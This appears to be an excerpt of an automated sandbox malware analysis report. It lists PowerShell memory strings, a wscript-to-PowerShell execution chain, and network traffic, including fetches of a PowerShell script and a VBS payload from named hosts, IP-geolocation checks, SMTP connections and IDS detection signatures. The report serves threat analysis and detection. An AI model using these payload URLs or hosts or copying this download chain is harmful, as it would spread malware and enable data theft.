                  Source: Binary string: nC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb.0 source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.Management.Infrastructure.Native.pdb9 source: powershell.exe, 00000016.00000002.2783605754.00000000071EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: corlib.pdbX0+ source: powershell.exe, 0000002B.00000002.2936384962.000000000843F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb= source: powershell.exe, 0000002B.00000002.2936384962.000000000843F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.pdb source: powershell.exe, 0000001E.00000002.2809296079.000000000814A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Management.Infrastructure.Native.pdb) source: powershell.exe, 0000002B.00000002.2936384962.000000000843F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdba0$ source: powershell.exe, 0000002B.00000002.2936384962.000000000843F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb; source: powershell.exe, 0000002B.00000002.2936384962.00000000084CD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: n.pdb source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: gement.Infrastructure.Native.pdb source: powershell.exe, 00000016.00000002.2783605754.0000000007190000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: n0C:\Windows\mscorlib.pdb source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000016.00000002.2804335664.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2936384962.000000000843F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: /C:\Users\user\AppData\Local\Temp\ilcg05nv.pdbhP source: powershell.exe, 00000004.00000002.2256554040.00000129015DE000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: ative.pdbou source: powershell.exe, 0000002B.00000002.2936384962.00000000084CD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: /C:\Users\user\AppData\Local\Temp\ilcg05nv.pdb source: powershell.exe, 00000004.00000002.2256554040.00000129015DE000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 364e35\Microsoft.Management.Infrastructure.Native.pdb& source: powershell.exe, 00000016.00000002.2806054422.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: indows\dll\mscorlib.pdb source: powershell.exe, 0000001E.00000002.2809296079.00000000081B0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: re.Native.pdb source: powershell.exe, 0000002B.00000002.2936384962.00000000084CD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: .pdba source: powershell.exe, 0000000D.00000002.3718811327.0000000008310000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32f source: powershell.exe, 0000001E.00000002.2807890146.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: %cqscorlib.pdbC source: powershell.exe, 00000016.00000002.2806054422.00000000080D0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: nC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb.0T source: powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: %%.pdb source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: ative.pdb source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: ative.pdbZ3 source: powershell.exe, 0000002B.00000002.2936384962.00000000084CD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2806054422.000000000804C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2783605754.0000000007190000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2793833295.00000000072DE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2936384962.00000000084BF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.Management.Infrastructure.Native.pdbev source: powershell.exe, 0000001E.00000002.2743365058.0000000002FE6000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb) source: powershell.exe, 0000001E.00000002.2809296079.000000000814A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 0000001E.00000002.2809296079.00000000081B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2936384962.00000000084CD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ::$DATAgement.Infrastructure.Native.pdb source: powershell.exe, 00000016.00000002.2783605754.0000000007190000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: nC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb.0d source: powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb8W source: powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: symbols\dll\mscorlib.pdbLb source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.Management.Infrastructure.Native.pdb source: powershell.exe, 0000001E.00000002.2809296079.00000000081B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2936384962.0000000008491000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2936384962.00000000084CD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2936384962.00000000084C3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb| source: powershell.exe, 0000002B.00000002.2936384962.00000000084CD000.00000004.00000020.00020000.00000000.sdmp

                  Software Vulnerabilities

                  barindex
                  Suspicious execution chain found
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 07289635h13_2_07289458
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 07289FBFh13_2_07289458
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push 00000000h13_2_0728C890
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 07283A40h13_2_07283798
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h13_2_07288F9B
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 072828E0h13_2_07282638
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 072858AAh13_2_07285600
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 07288120h13_2_07287E78
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]13_2_0728D69A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 07283190h13_2_07282EE8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 07286FC0h13_2_07286D18
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 07284FF8h13_2_07284D50
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 07282030h13_2_07281D88
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 07287870h13_2_072875C8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 07286710h13_2_07286468
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 07284748h13_2_072844A0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 072835E8h13_2_07283340
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 07285E60h13_2_07285BB8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push 00000000h13_2_0728D3E3
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 07283E98h13_2_07283BF0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 07287CC8h13_2_07287A20
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 07282D38h13_2_07282A90
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 07288578h13_2_072882D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h13_2_07288968
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h13_2_0728917B
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 07287418h13_2_07287170
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 07285450h13_2_072851A8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 07282488h13_2_072821E0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 072862B8h13_2_07286010
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 072842F0h13_2_07284048
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 07284BA0h13_2_072848F8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 07286B68h13_2_072868C0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, 000003E8h13_2_072E7808
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, 000003E8h13_2_072E7579

                  Networking

                  barindex
                  Uses known network protocols on non-standard ports
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 5000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49708
                  Source: global trafficTCP traffic: 192.168.2.5:49708 -> 45.200.149.104:5000
                  Source: global trafficTCP traffic: 192.168.2.5:49833 -> 198.54.122.135:587
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                  Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                  Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49774 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49876 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49903 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49967 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50015 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49930 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50024 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49985 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50031 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50062 -> 158.101.44.242:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50068 -> 158.101.44.242:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50091 -> 158.101.44.242:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50082 -> 158.101.44.242:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50088 -> 158.101.44.242:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50078 -> 158.101.44.242:80
                  Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49730 -> 168.119.145.117:443
                  Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49941 -> 168.119.145.117:443
                  Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49881 -> 168.119.145.117:443
                  Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:50045 -> 168.119.145.117:443
                  Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:50095 -> 168.119.145.117:443
                  Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:50061 -> 168.119.145.117:443
                  Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:50056 -> 168.119.145.117:443
                  Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:50076 -> 168.119.145.117:443
                  Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:50035 -> 168.119.145.117:443
                  Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:50026 -> 168.119.145.117:443
                  Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:50052 -> 168.119.145.117:443
                  Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:50089 -> 168.119.145.117:443
                  Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:50007 -> 168.119.145.117:443
                  Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:50086 -> 168.119.145.117:443
                  Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:50069 -> 168.119.145.117:443
                  Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:50021 -> 168.119.145.117:443
                  Source: global trafficTCP traffic: 192.168.2.5:49833 -> 198.54.122.135:587
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /8-5S.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /download/nova_kaycee.vbs HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.200.149.104:5000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
